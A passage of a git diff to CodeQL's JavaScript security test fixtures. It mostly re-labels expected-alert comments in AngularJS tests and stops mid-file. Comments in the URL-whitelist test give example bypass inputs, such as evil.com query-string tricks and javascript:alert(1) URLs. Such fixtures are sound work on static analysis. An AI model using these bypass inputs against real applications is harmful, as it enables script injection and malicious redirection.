+- .../RegExp/UnmatchableDollar/tst.js | 31 +- .../tst-IncompleteHostnameRegExp.js | 6 +- .../IncompleteUrlSchemeCheck.js | 4 +- .../tst-IncompleteUrlSubstringSanitization.js | 4 +- .../CWE-020/IncorrectSuffixCheck/tst.js | 48 +-- .../CWE-020/MissingOriginCheck/tst.js | 6 +- .../tst-SemiAnchoredRegExp.js | 56 ++-- .../tst-UnanchoredUrlRegExp.js | 84 ++--- .../CWE-020/SuspiciousRegexpRange/tst.js | 34 +- .../CWE-022/TaintedPath/TaintedPath-es6.js | 3 +- .../CWE-022/TaintedPath/TaintedPath.js | 147 ++++----- .../TaintedPath/examples/TaintedPath.js | 3 +- .../TaintedPath/examples/TaintedPathGood.js | 2 +- .../CWE-022/TaintedPath/handlebars.js | 10 +- .../CWE-022/TaintedPath/normalizedPaths.js | 208 ++++++------ .../CWE-022/TaintedPath/other-fs-libraries.js | 48 +-- .../Security/CWE-022/TaintedPath/prettier.js | 4 +- .../CWE-022/TaintedPath/sharedlib-repro.js | 2 +- .../TaintedPath/tainted-access-paths.js | 20 +- .../TaintedPath/tainted-array-steps.js | 4 +- .../TaintedPath/tainted-promise-steps.js | 4 +- .../CWE-022/TaintedPath/tainted-require.js | 7 +- .../CWE-022/TaintedPath/tainted-sendFile.js | 21 +- .../TaintedPath/tainted-string-steps.js | 38 +-- .../Security/CWE-022/TaintedPath/torrents.js | 2 +- .../CWE-022/TaintedPath/typescript.ts | 15 +- .../Security/CWE-022/ZipSlip/ZipSlipBad.js | 2 +- .../Security/CWE-022/ZipSlip/ZipSlipGood.js | 4 +- .../query-tests/Security/CWE-073/routes.js | 2 +- .../test/query-tests/Security/CWE-073/tst.js | 16 +- .../test/query-tests/Security/CWE-073/tst2.js | 14 +- .../CWE-078/CommandInjection/actions.js | 4 +- .../CommandInjection/child_process-test.js | 60 ++-- .../CWE-078/CommandInjection/exec-sh.js | 2 +- .../CWE-078/CommandInjection/exec-sh2.js | 2 +- .../CWE-078/CommandInjection/execSeries.js | 2 +- .../CWE-078/CommandInjection/form-parsers.js | 14 +- .../CWE-078/CommandInjection/other.js | 40 +-- .../IndirectCommandInjection/actions.js | 10 +- ...ommand-line-parameter-command-injection.js | 76 ++--- .../second-order.js | 24 +- ...hell-command-injection-from-environment.js | 10 +- .../lib/isImported.js | 2 +- .../UnsafeShellCommandConstruction/lib/lib.js | 258 +++++++-------- .../lib/lib2.js | 4 +- .../lib/other.js | 2 +- .../lib/subLib/amdSub.js | 2 +- .../lib/subLib/index.js | 6 +- .../lib/subLib2/compiled-file.ts | 2 +- .../lib/subLib2/special-file.js | 2 +- .../lib/subLib3/my-file.ts | 2 +- .../lib/subLib4/subsub.js | 2 +- .../CWE-078/UselessUseOfCat/uselesscat.js | 98 +++--- .../CWE-079/DomBasedXss/addEventListener.js | 10 +- .../DomBasedXss/angular-tempate-url.js | 4 +- .../CWE-079/DomBasedXss/angular2-client.ts | 30 +- .../CWE-079/DomBasedXss/classnames.js | 16 +- .../Security/CWE-079/DomBasedXss/clipboard.ts | 12 +- .../CWE-079/DomBasedXss/custom-element.js | 2 +- .../Security/CWE-079/DomBasedXss/d3.js | 8 +- .../Security/CWE-079/DomBasedXss/dates.js | 34 +- .../CWE-079/DomBasedXss/dragAndDrop.ts | 10 +- .../Security/CWE-079/DomBasedXss/encodeuri.js | 2 +- .../DomBasedXss/event-handler-receiver.js | 2 +- .../Security/CWE-079/DomBasedXss/express.js | 5 +- .../Security/CWE-079/DomBasedXss/jquery.js | 42 +-- .../CWE-079/DomBasedXss/json-stringify.jsx | 8 +- .../CWE-079/DomBasedXss/jwt-server.js | 3 +- .../Security/CWE-079/DomBasedXss/jwt.js | 2 +- .../CWE-079/DomBasedXss/nodemailer.js | 4 +- .../CWE-079/DomBasedXss/optionalSanitizer.js | 22 +- .../CWE-079/DomBasedXss/pages/[id].jsx | 6 +- .../CWE-079/DomBasedXss/react-native.js | 4 +- .../CWE-079/DomBasedXss/react-use-context.js | 4 +- .../CWE-079/DomBasedXss/react-use-router.js | 10 +- .../CWE-079/DomBasedXss/react-use-state.js | 10 +- .../Security/CWE-079/DomBasedXss/sanitiser.js | 26 +- .../CWE-079/DomBasedXss/stored-xss.js | 16 +- .../DomBasedXss/string-manipulations.js | 22 +- .../tainted-url-suffix-arguments.js | 6 +- .../Security/CWE-079/DomBasedXss/tooltip.jsx | 10 +- .../Security/CWE-079/DomBasedXss/translate.js | 5 +- .../CWE-079/DomBasedXss/trusted-types.js | 6 +- .../Security/CWE-079/DomBasedXss/tst.js | 279 ++++++++-------- .../Security/CWE-079/DomBasedXss/tst3.js | 16 +- .../Security/CWE-079/DomBasedXss/typeahead.js | 2 +- .../various-concat-obfuscations.js | 20 +- .../Security/CWE-079/ExceptionXss/ajv.js | 4 +- .../CWE-079/ExceptionXss/exception-xss.js | 54 +-- .../CWE-079/ReflectedXss/ReflectedXss.js | 47 ++- .../ReflectedXss/ReflectedXssContentTypes.js | 18 +- .../CWE-079/ReflectedXss/ReflectedXssGood.js | 14 +- .../CWE-079/ReflectedXss/ReflectedXssGood3.js | 8 +- .../Security/CWE-079/ReflectedXss/cookies.js | 2 +- .../CWE-079/ReflectedXss/formatting.js | 6 +- .../CWE-079/ReflectedXss/live-server.js | 4 +- .../Security/CWE-079/ReflectedXss/partial.js | 10 +- .../Security/CWE-079/ReflectedXss/promises.js | 4 +- .../Security/CWE-079/ReflectedXss/tst2.js | 32 +- .../Security/CWE-079/ReflectedXss/tst3.js | 4 +- .../StoredXss/xss-through-filenames.js | 8 +- .../CWE-079/StoredXss/xss-through-torrent.js | 2 +- .../UnsafeHtmlConstruction/jquery-plugin.js | 6 +- .../UnsafeHtmlConstruction/lib/src/MyNode.ts | 2 +- .../UnsafeHtmlConstruction/lib2/index.ts | 6 +- .../UnsafeHtmlConstruction/lib2/src/MyNode.ts | 2 +- .../CWE-079/UnsafeHtmlConstruction/main.js | 42 +-- .../CWE-079/UnsafeHtmlConstruction/typed.ts | 6 +- .../unsafe-jquery-plugin.js | 96 +++--- .../Security/CWE-079/XssThroughDom/angular.ts | 14 +- .../Security/CWE-079/XssThroughDom/forms.js | 24 +- .../CWE-079/XssThroughDom/xss-through-dom.js | 84 ++--- .../CWE-089/local-threat-source/test.js | 2 +- .../Security/CWE-089/typed/typedClient.ts | 6 +- .../Security/CWE-089/untyped/graphql.js | 26 +- .../CWE-089/untyped/html-sanitizer.js | 2 +- .../CWE-089/untyped/json-schema-validator.js | 16 +- .../Security/CWE-089/untyped/koarouter.js | 2 +- .../Security/CWE-089/untyped/ldap.js | 14 +- .../CWE-089/untyped/marsdb-flow-to.js | 3 +- .../Security/CWE-089/untyped/marsdb.js | 3 +- .../Security/CWE-089/untyped/minimongo.js | 3 +- .../Security/CWE-089/untyped/mongodb.js | 31 +- .../CWE-089/untyped/mongodb_bodySafe.js | 5 +- .../Security/CWE-089/untyped/mongoose.js | 138 ++++---- .../CWE-089/untyped/mongooseJsonParse.js | 3 +- .../CWE-089/untyped/mongooseModelClient.js | 6 +- .../Security/CWE-089/untyped/mysql.js | 6 +- .../CWE-089/untyped/pg-promise-types.ts | 2 +- .../Security/CWE-089/untyped/pg-promise.js | 48 +-- .../Security/CWE-089/untyped/redis.js | 26 +- .../Security/CWE-089/untyped/tst2.js | 5 +- .../Security/CWE-089/untyped/tst3.js | 4 +- .../CodeInjection/NoSQLCodeInjection.js | 8 +- .../Security/CWE-094/CodeInjection/actions.js | 2 +- .../CWE-094/CodeInjection/angularjs.js | 42 +-- .../CodeInjection/bad-code-sanitization.js | 22 +- .../Security/CWE-094/CodeInjection/express.js | 29 +- .../CWE-094/CodeInjection/lib/index.js | 28 +- .../Security/CWE-094/CodeInjection/module.js | 4 +- .../CWE-094/CodeInjection/react-native.js | 4 +- .../CWE-094/CodeInjection/template-sinks.js | 28 +- .../Security/CWE-094/CodeInjection/tst.js | 33 +- .../CWE-094/CodeInjection/webix/webix.html | 6 +- .../CWE-094/CodeInjection/webix/webix.js | 6 +- .../UnsafeDynamicMethodAccess/example.js | 2 +- .../CWE-094/UnsafeDynamicMethodAccess/tst.js | 10 +- .../Security/CWE-1004/tst-httpOnly.js | 74 ++--- .../Security/CWE-116/BadTagFilter/tst.js | 44 +-- .../Security/CWE-116/DoubleEscaping/tst.js | 6 +- .../UnsafeHtmlExpansion.js | 24 +- .../tst-multi-character-sanitization.js | 119 ++++--- .../CWE-116/IncompleteSanitization/tst.js | 214 ++++++------ .../Security/CWE-117/logInjectionBad.js | 46 +-- .../Security/CWE-117/logInjectionGood.js | 10 +- .../Security/CWE-1275/tst-sameSite.js | 30 +- .../test/query-tests/Security/CWE-134/tst.js | 44 +-- .../test/query-tests/Security/CWE-178/tst.js | 14 +- .../Security/CWE-200/bufferRead.js | 3 +- .../Security/CWE-200/express-send-file.js | 2 +- .../Security/CWE-200/googlecompiler.js | 5 +- .../query-tests/Security/CWE-200/lib/tst.js | 6 +- .../Security/CWE-200/private-file-exposure.js | 26 +- .../Security/CWE-200/readFileSync.js | 3 +- .../Security/CWE-200/readStreamRead.js | 3 +- .../query-tests/Security/CWE-200/request.js | 4 +- .../Security/CWE-200/sentAsHeaders.js | 4 +- .../Security/CWE-201/PostMessageStar2.js | 8 +- .../test/query-tests/Security/CWE-209/node.js | 4 +- .../test/query-tests/Security/CWE-209/tst.js | 12 +- .../test/query-tests/Security/CWE-295/tst.js | 44 +-- .../Security/CWE-312/CleartextStorage.js | 3 +- .../Security/CWE-312/CleartextStorageGood.js | 2 +- .../Security/CWE-312/build-leaks.js | 14 +- .../query-tests/Security/CWE-312/passwords.js | 124 +++---- .../Security/CWE-312/tst-angularjs.js | 14 +- .../test/query-tests/Security/CWE-326/tst.js | 38 +-- .../Security/CWE-327/bad-random.js | 42 +-- .../test/query-tests/Security/CWE-327/tst.js | 14 +- .../test/query-tests/Security/CWE-338/tst.js | 52 +-- .../test/query-tests/Security/CWE-346/tst.js | 22 +- .../query-tests/Security/CWE-347/bad-jwt.js | 8 +- .../Security/CWE-352/csurf_api_example.js | 2 +- .../Security/CWE-352/csurf_example.js | 4 +- .../query-tests/Security/CWE-352/fastify.js | 2 +- .../query-tests/Security/CWE-352/fastify2.js | 2 +- .../Security/CWE-352/lusca_example.js | 6 +- .../test/query-tests/Security/CWE-352/tst.js | 2 +- .../test/query-tests/Security/CWE-367/tst.js | 12 +- .../CWE-377/insecure-temporary-file.js | 16 +- .../test/query-tests/Security/CWE-384/tst.js | 6 +- .../DeepObjectResourceExhaustion/tst.js | 2 +- .../Security/CWE-400/ReDoS/jsonschema.js | 6 +- .../Security/CWE-400/ReDoS/lib/closure.js | 2 +- .../Security/CWE-400/ReDoS/lib/indirect.js | 2 +- .../Security/CWE-400/ReDoS/lib/lib.js | 14 +- .../CWE-400/ReDoS/lib/moduleLib/moduleLib.js | 2 +- .../ReDoS/lib/otherLib/js/src/index.js | 2 +- .../Security/CWE-400/ReDoS/lib/snapdragon.js | 6 +- .../CWE-400/ReDoS/lib/subLib4/factory.js | 2 +- .../CWE-400/ReDoS/lib/subLib5/feature.js | 2 +- .../CWE-400/ReDoS/lib/subLib5/main.js | 2 +- .../CWE-400/ReDoS/lib/subLib5/subclass.js | 2 +- .../CWE-400/ReDoS/lib/subLib6/index.js | 2 +- .../CWE-400/ReDoS/lib/sublib/factory.js | 2 +- .../CWE-400/ReDoS/polynomial-redos.js | 196 +++++------ .../query-tests/Security/CWE-400/ReDoS/tst.js | 308 +++++++----------- .../CWE-400/RemovePropertyInjection/tst.js | 12 +- .../RemovePropertyInjection/tstNonExpr.js | 4 +- .../test/query-tests/Security/CWE-502/tst.js | 30 +- .../test/query-tests/Security/CWE-506/tst.js | 8 +- .../CWE-522-DecompressionBombs/fflate.js | 5 +- .../test/query-tests/Security/CWE-598/tst.js | 12 +- .../CWE-601/ClientSideUrlRedirect/react.js | 8 +- .../ClientSideUrlRedirect/regexp-exec.js | 16 +- .../ClientSideUrlRedirect/sanitizer.js | 24 +- .../CWE-601/ClientSideUrlRedirect/tst.js | 11 +- .../CWE-601/ClientSideUrlRedirect/tst10.js | 12 +- .../CWE-601/ClientSideUrlRedirect/tst11.js | 2 +- .../CWE-601/ClientSideUrlRedirect/tst13.js | 40 +-- .../CWE-601/ClientSideUrlRedirect/tst14.js | 4 +- .../CWE-601/ClientSideUrlRedirect/tst15.js | 22 +- .../CWE-601/ClientSideUrlRedirect/tst2.js | 3 +- .../CWE-601/ClientSideUrlRedirect/tst3.js | 2 +- .../CWE-601/ClientSideUrlRedirect/tst4.js | 2 +- .../CWE-601/ClientSideUrlRedirect/tst5.js | 2 +- .../CWE-601/ClientSideUrlRedirect/tst6.js | 9 +- .../CWE-601/ClientSideUrlRedirect/tst7.js | 6 +- .../CWE-601/ClientSideUrlRedirect/tst8.js | 2 +- .../CWE-601/ClientSideUrlRedirect/tst9.js | 3 +- .../CWE-601/ClientSideUrlRedirect/typed.ts | 8 +- .../ServerSideUrlRedirect.js | 3 +- .../ServerSideUrlRedirectGood.js | 2 +- .../ServerSideUrlRedirectGood2.js | 2 +- .../CWE-601/ServerSideUrlRedirect/express.js | 82 ++--- .../CWE-601/ServerSideUrlRedirect/koa.js | 16 +- .../CWE-601/ServerSideUrlRedirect/next.ts | 2 +- .../CWE-601/ServerSideUrlRedirect/node.js | 14 +- .../ServerSideUrlRedirect/react-native.js | 4 +- .../query-tests/Security/CWE-611/closure.js | 2 +- .../query-tests/Security/CWE-611/domparser.js | 8 +- .../query-tests/Security/CWE-611/expat.js | 2 +- .../query-tests/Security/CWE-611/libxml.js | 2 +- .../Security/CWE-611/libxml.noent.js | 12 +- .../Security/CWE-614/tst-cleartextCookie.js | 62 ++-- .../test/query-tests/Security/CWE-640/tst.js | 8 +- .../Security/CWE-643/XpathInjectionBad.js | 3 +- .../Security/CWE-643/XpathInjectionGood.js | 2 +- .../test/query-tests/Security/CWE-643/tst.js | 8 +- .../test/query-tests/Security/CWE-643/tst2.js | 4 +- .../Security/CWE-693/InsecureHelmetBad.js | 4 +- .../Security/CWE-693/InsecureHelmetGood.js | 2 +- .../Security/CWE-730/RegExpInjection.js | 61 ++-- .../Security/CWE-730/RegExpInjectionGood.js | 2 +- .../Security/CWE-730/server-crash.js | 46 +-- .../test/query-tests/Security/CWE-730/tst.js | 2 +- .../CWE-754/UnsafeDynamicMethodAccess.js | 10 +- .../CWE-754/UnvalidatedDynamicMethodCall2.js | 2 +- .../CWE-754/UnvalidatedDynamicMethodCall3.js | 2 +- .../UnvalidatedDynamicMethodCallGood.js | 2 +- .../UnvalidatedDynamicMethodCallGood3.js | 2 +- .../UnvalidatedDynamicMethodCallGood4.js | 4 +- .../test/query-tests/Security/CWE-754/tst.js | 30 +- .../Security/CWE-770/MissingRateLimit/tst.js | 44 +-- .../Security/CWE-770/MissingRateLimit/tst2.ts | 2 +- .../Security/CWE-770/MissingRateLimit/tst3.js | 2 +- .../Security/CWE-770/MissingRateLimit/tst4.js | 2 +- .../ResourceExhaustion_timeout.js | 2 +- .../ResourceExhaustion_timeout_fixed.js | 2 +- .../ResourceExhaustion/resource-exhaustion.js | 96 +++--- .../query-tests/Security/CWE-776/closure.js | 3 +- .../query-tests/Security/CWE-776/domparser.js | 9 +- .../query-tests/Security/CWE-776/expat.js | 2 +- .../query-tests/Security/CWE-776/jquery.js | 3 +- .../query-tests/Security/CWE-776/libxml.js | 3 +- .../Security/CWE-776/libxml.noent.js | 3 +- .../Security/CWE-776/libxml.sax.js | 2 +- .../Security/CWE-776/libxml.saxpush.js | 2 +- .../Security/CWE-798/HardcodedCredentials.js | 160 ++++----- .../__tests__/HardcodedCredentialsDemo.js | 8 +- .../Security/CWE-807/example_bypass.js | 9 +- .../tst-different-kinds-comparison-bypass.js | 18 +- .../test/query-tests/Security/CWE-807/tst.js | 42 +-- .../Security/CWE-829/insecure-download.js | 20 +- .../DynamicCreationOfUntrustedSourceUse.html | 20 +- .../StaticCreationOfUntrustedSourceUse.html | 21 +- .../Security/CWE-834/LoopBoundInjectionBad.js | 8 +- .../CWE-834/LoopBoundInjectionExitBad.js | 8 +- .../CWE-834/LoopBoundInjectionExitGood.js | 8 +- .../CWE-834/LoopBoundInjectionGood.js | 8 +- .../CWE-834/LoopBoundInjectionLodash.js | 2 +- .../LoopBoundInjectionObviousLengthCheck.js | 2 +- .../LoopBoundInjectionObviousNullPointer.js | 10 +- ...jectionObviousNullPointerInPreviousLoop.js | 4 +- .../test/query-tests/Security/CWE-843/tst.js | 66 ++-- .../test/query-tests/Security/CWE-912/tst.js | 10 +- .../PrototypePollutingAssignment/lib.js | 30 +- .../otherlib/src/otherlibimpl.js | 2 +- .../sublib/other.js | 2 +- .../sublib/sub.js | 2 +- .../PrototypePollutingAssignment/tst.js | 60 ++-- .../path-assignment.js | 10 +- .../PrototypePollutingFunction/tests.js | 92 +++--- .../angularmerge.js | 2 +- .../src-non-vulnerable-lodash/tst.js | 2 +- .../src-vulnerable-lodash/tst.js | 8 +- .../webix/webix.html | 4 +- .../webix/webix.js | 4 +- .../test/query-tests/Security/CWE-916/tst.js | 8 +- .../Security/CWE-918/clientSide.js | 14 +- .../Security/CWE-918/serverSide.js | 54 +-- .../Statements/EphemeralLoop/tst.js | 10 +- .../Statements/IgnoreArrayResult/tst.js | 4 +- .../Statements/ImplicitReturn/tst.js | 25 +- .../InconsistentLoopOrientation/tst.js | 13 +- .../LoopIterationSkippedDueToShifting/tst.js | 12 +- .../Statements/NestedLoopsSameVariable/tst.js | 5 +- .../Statements/ReturnAssignsLocal/tst.js | 18 +- .../Statements/ReturnOutsideFunction/tst.js | 3 +- .../tst.js | 41 ++- .../UnreachableStatement/typealias.ts | 2 +- .../UseOfReturnlessFunction/tst.html | 2 +- .../Statements/UseOfReturnlessFunction/tst.js | 30 +- .../UseOfReturnlessFunction/tst2.ts | 2 +- .../UselessComparisonTest/constant.js | 4 +- .../UselessComparisonTest/defaults.js | 6 +- .../UselessComparisonTest/implicitReturn.js | 2 +- .../UselessConditional/UselessConditional.js | 56 ++-- .../UselessConditionalGood.js | 38 +-- javascript/ql/test/query-tests/Vue/tst.js | 16 +- .../external/DuplicateFunction/d/tst.js | 2 +- 536 files changed, 4420 insertions(+), 4774 deletions(-) diff --git a/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/tst.js b/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/tst.js index d8616c9e2399..58b700a4c3f2 100644 --- a/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/tst.js +++ b/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/tst.js @@ -1,50 +1,50 @@ angular.module('myModule', []) .controller('MyController', function($scope) { - $scope.$on('destroy', cleanup); // BAD + $scope.$on('destroy', cleanup); // $ Alert }) .controller('MyController', ["$scope", function(s) { - s.$on('destroy', cleanup); // BAD + s.$on('destroy', cleanup); // $ Alert }]) .controller('MyController', function($scope) { var destroy = 'destroy'; - $scope.$on(destroy, cleanup); // BAD + $scope.$on(destroy, cleanup); // $ Alert }) .controller('MyController', function($scope) { - $scope.$on('$destroy', cleanup); // GOOD + $scope.$on('$destroy', cleanup); }) .controller('MyController', function($scope) { $scope.$emit('foo'); - $scope.$on('foo', cleanup); // GOOD + $scope.$on('foo', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('bar', cleanup); // BAD + $scope.$on('bar', cleanup); // $ Alert }) .controller('MyController', function($scope) { - $scope.$on('$locationChangeStart', cleanup); // OK + $scope.$on('$locationChangeStart', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('lib1.foo', cleanup); // OK + $scope.$on('lib1.foo', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('lib2:foo', cleanup); // OK + $scope.$on('lib2:foo', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('onClick', cleanup); // OK + $scope.$on('onClick', cleanup); }) .controller('MyController', function($scope) { function f($scope){ $scope.$emit('probablyFromUserCode1') } - $scope.$on('probablyFromUserCode1', cleanup); // OK + $scope.$on('probablyFromUserCode1', cleanup); }) .controller('MyController', function($scope) { function f($scope){ var scope = $scope; scope.$emit('probablyFromUserCode2') } - $scope.$on('probablyFromUserCode2', cleanup); // OK + $scope.$on('probablyFromUserCode2', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('event-from-AngularJS-expression', cleanup); // GOOD + $scope.$on('event-from-AngularJS-expression', cleanup); }) ; diff --git a/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/tst.js b/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/tst.js index c60a937b4c45..3afff0e3a50b 100644 --- a/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/tst.js +++ b/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/tst.js @@ -1,36 +1,36 @@ angular.module('app1', []) - .run(['dep1', 'dep2', 'dep3', function(dep1, dep3, dep2) {}]); // NOT OK + .run(['dep1', 'dep2', 'dep3', function(dep1, dep3, dep2) {}]); // $ Alert angular.module('app2') - .directive('mydirective', [ '$compile', function($compile, $http) { // NOT OK + .directive('mydirective', [ '$compile', function($compile, $http) { // $ Alert // ... }]); angular.module('app1', []) - .run(['dep1', 'dep2', 'dep3', function(dep1, dep2, dep3) {}]); // OK + .run(['dep1', 'dep2', 'dep3', function(dep1, dep2, dep3) {}]); angular.module('app2') - .directive('mydirective', [ '$compile', '$http', function($compile, $http) { // OK + .directive('mydirective', [ '$compile', '$http', function($compile, $http) { // ... }]); angular.module('app3', []) - .run(function(dep1, dep3) {}); // OK + .run(function(dep1, dep3) {}); angular.module('app4') - .directive('mydirective', function($compile, $http) { // OK + .directive('mydirective', function($compile, $http) { // ... }); angular.module('app5') - .directive('mydirective', [ 'fully.qualified.name', function(name) { // OK + .directive('mydirective', [ 'fully.qualified.name', function(name) { // ... }]) angular.module('app6') .directive('mydirective', function() { return { - link: function (scope, element, attrs) { // OK + link: function (scope, element, attrs) { } }; }); diff --git a/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.js b/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.js index 2ef8930246f9..312af00754e6 100644 --- a/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.js +++ b/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.js @@ -1,17 +1,17 @@ angular.module('app', []) .config(function($sceProvider) { - $sceProvider.enabled(false); // BAD + $sceProvider.enabled(false); // $ Alert }) .config(['otherProvider', function($sceProvider) { - $sceProvider.enabled(false); // OK + $sceProvider.enabled(false); }]) .config(['$sceProvider', function(x) { - x.enabled(false); // BAD + x.enabled(false); // $ Alert }]) .config(function($sceProvider) { - $sceProvider.enabled(true); // OK + $sceProvider.enabled(true); }) .config(function($sceProvider) { var x = false; - $sceProvider.enabled(x); // BAD + $sceProvider.enabled(x); // $ Alert }); diff --git a/javascript/ql/test/query-tests/AngularJS/IncompatibleService/angular-incompatible-service.js b/javascript/ql/test/query-tests/AngularJS/IncompatibleService/angular-incompatible-service.js index 51dbd1f76d48..c3855f207c04 100644 --- a/javascript/ql/test/query-tests/AngularJS/IncompatibleService/angular-incompatible-service.js +++ b/javascript/ql/test/query-tests/AngularJS/IncompatibleService/angular-incompatible-service.js @@ -11,68 +11,68 @@ angular.module('myModule', []) ; angular.module('myModule2', []) - .controller('c0', function(factoryId){}) // OK - .controller('c1', function(serviceId){}) // OK - .controller('c2', function(valueId){}) // OK - .controller('c3', function(constantId){}) // OK - .controller('c4', function(providerId){}) // OK - .controller('c5', function($http){}) // OK - .controller('c6', function($provider){}) // NOT OK - .controller('c7', function($scope){}) // OK - .controller('c8', function($compile){}) // OK - .controller('c9', function(UNKNOWN){}) // OK - .controller('c10', function(providerIdProvider){}) // NOT OK - .controller('c11', function(providerIdProvider, UNKNOWN){}) // NOT OK, but only one error - .controller('c12', function($provide){}) // OK (special case) - .controller('c13', function(providerId2Provider){}) // NOT OK + .controller('c0', function(factoryId){}) + .controller('c1', function(serviceId){}) + .controller('c2', function(valueId){}) + .controller('c3', function(constantId){}) + .controller('c4', function(providerId){}) + .controller('c5', function($http){}) + .controller('c6', function($provider){}) // $ Alert + .controller('c7', function($scope){}) + .controller('c8', function($compile){}) + .controller('c9', function(UNKNOWN){}) + .controller('c10', function(providerIdProvider){}) // $ Alert + .controller('c11', function(providerIdProvider, UNKNOWN){}) // $ Alert - but only one error + .controller('c12', function($provide){}) // OK - special case + .controller('c13', function(providerId2Provider){}) // $ Alert - .factory('s0', function(factoryId){}) // OK - .factory('s1', function(serviceId){}) // OK - .factory('s2', function(valueId){}) // OK - .factory('s3', function(constantId){}) // OK - .factory('s4', function(providerId){}) // OK - .factory('s5', function($http){}) // OK - .factory('s6', function($provider){}) // NOT OK - .factory('s7', function($scope){}) // NOT OK - .factory('s8', function($compile){}) // OK - .factory('s9', function(UNKNOWN){}) // OK - .factory('s10', function(providerIdProvider){}) // NOT OK - .factory('s11', function(providerIdProvider, UNKNOWN){}) // NOT OK, but only one error - .factory('s12', function($provide){}) // OK (special case) - .factory('s13', function(providerId2Provider){}) // NOT OK + .factory('s0', function(factoryId){}) + .factory('s1', function(serviceId){}) + .factory('s2', function(valueId){}) + .factory('s3', function(constantId){}) + .factory('s4', function(providerId){}) + .factory('s5', function($http){}) + .factory('s6', function($provider){}) // $ Alert + .factory('s7', function($scope){}) // $ Alert + .factory('s8', function($compile){}) + .factory('s9', function(UNKNOWN){}) + .factory('s10', function(providerIdProvider){}) // $ Alert + .factory('s11', function(providerIdProvider, UNKNOWN){}) // $ Alert - but only one error + .factory('s12', function($provide){}) // OK - special case + .factory('s13', function(providerId2Provider){}) // $ Alert - .run(function(factoryId){}) // OK - .run(function(serviceId){}) // OK - .run(function(valueId){}) // OK - .run(function(constantId){}) // OK - .run(function(providerId){}) // OK - .run(function($http){}) // OK - .run(function($provider){}) // NOT OK - .run(function($scope){}) // NOT OK - .run(function($compile){}) // OK - .run(function(UNKNOWN){}) // OK - .run(function(providerIdProvider){}) // NOT OK - .run(function(providerIdProvider, UNKNOWN){}) // NOT OK, but only one error - .run(function($provide){}) // OK (special case) - .run(function(providerId2Provider){}) // NOT OK + .run(function(factoryId){}) + .run(function(serviceId){}) + .run(function(valueId){}) + .run(function(constantId){}) + .run(function(providerId){}) + .run(function($http){}) + .run(function($provider){}) // $ Alert + .run(function($scope){}) // $ Alert + .run(function($compile){}) + .run(function(UNKNOWN){}) + .run(function(providerIdProvider){}) // $ Alert + .run(function(providerIdProvider, UNKNOWN){}) // $ Alert - but only one error + .run(function($provide){}) // OK - special case + .run(function(providerId2Provider){}) // $ Alert - .config(function(factoryId){}) // NOT OK - .config(function(serviceId){}) // NOT OK - .config(function(valueId){}) // NOT OK - .config(function(constantId){}) // OK - .config(function(providerId){}) // NOT OK - .config(function($http){}) // NOT OK - .config(function($provider){}) // OK - .config(function($scope){}) // NOT OK - .config(function($compile){}) // OK - .config(function(UNKNOWN){}) // OK - .config(function(providerIdProvider){}) // OK - .config(function(providerId, UNKNOWN){}) // NOT OK, but only one error - .config(function($provide){}) // OK (special case) - .config(function(valueId2){}) // NOT OK + .config(function(factoryId){}) // $ Alert + .config(function(serviceId){}) // $ Alert + .config(function(valueId){}) // $ Alert + .config(function(constantId){}) + .config(function(providerId){}) // $ Alert + .config(function($http){}) // $ Alert + .config(function($provider){}) + .config(function($scope){}) // $ Alert + .config(function($compile){}) + .config(function(UNKNOWN){}) + .config(function(providerIdProvider){}) + .config(function(providerId, UNKNOWN){}) // $ Alert - but only one error + .config(function($provide){}) // OK - special case + .config(function(valueId2){}) // $ Alert // service: same restrcitions as .factory - .service('s14', function(factoryId){}) // OK - .service('s15', function($provider){}) // NOT OK + .service('s14', function(factoryId){}) + .service('s15', function($provider){}) // $ Alert ; diff --git a/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js b/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js index 713e36e52233..6ede37fed7cc 100644 --- a/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js +++ b/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js @@ -1,24 +1,24 @@ angular.module('myApp', []) .config(function($sceDelegateProvider) { $sceDelegateProvider.resourceUrlWhitelist([ - "**://example.com/*", // BAD (exploit: http://evil.com/?ignore=://example.org/a or javascript:alert(1);://example.org/a) - "*://example.org/*", // BAD (exploit: javascript://example.org/a%0A%0Dalert(1) using a linebreak to end the comment starting with "//"!) - "https://**.example.com/*", // BAD (exploit: https://evil.com/?ignore=://example.com/a) - "https://example.**", // BAD (exploit: https://example.evil.com or http://example.:foo@evil.com) - "https://example.*", // BAD (exploit: https://example.UnexpectedTLD) + "**://example.com/*", // $ Alert - (exploit: http://evil.com/?ignore=://example.org/a or javascript:alert(1);://example.org/a) + "*://example.org/*", // $ Alert - (exploit: javascript://example.org/a%0A%0Dalert(1) using a linebreak to end the comment starting with "//"!) + "https://**.example.com/*", // $ Alert - exploit: https://evil.com/?ignore=://example.com/a + "https://example.**", // $ Alert - exploit: https://example.evil.com or http://example.:foo@evil.com + "https://example.*", // $ Alert - exploit: https://example.UnexpectedTLD - "https://example.com", // OK - "https://example.com/**", // OK - "https://example.com/*", // OK - "https://example.com/foo/*", // OK - "https://example.com/foo/**", // OK - "https://example.com/foo/*/bar", // OK - "https://example.com/foo/**/bar", // OK - "https://example.com/?**", // OK - "https://example.com/?**://example.com", // OK + "https://example.com", + "https://example.com/**", + "https://example.com/*", + "https://example.com/foo/*", + "https://example.com/foo/**", + "https://example.com/foo/*/bar", + "https://example.com/foo/**/bar", + "https://example.com/?**", + "https://example.com/?**://example.com", "https://*.example.com", // not flagged: - 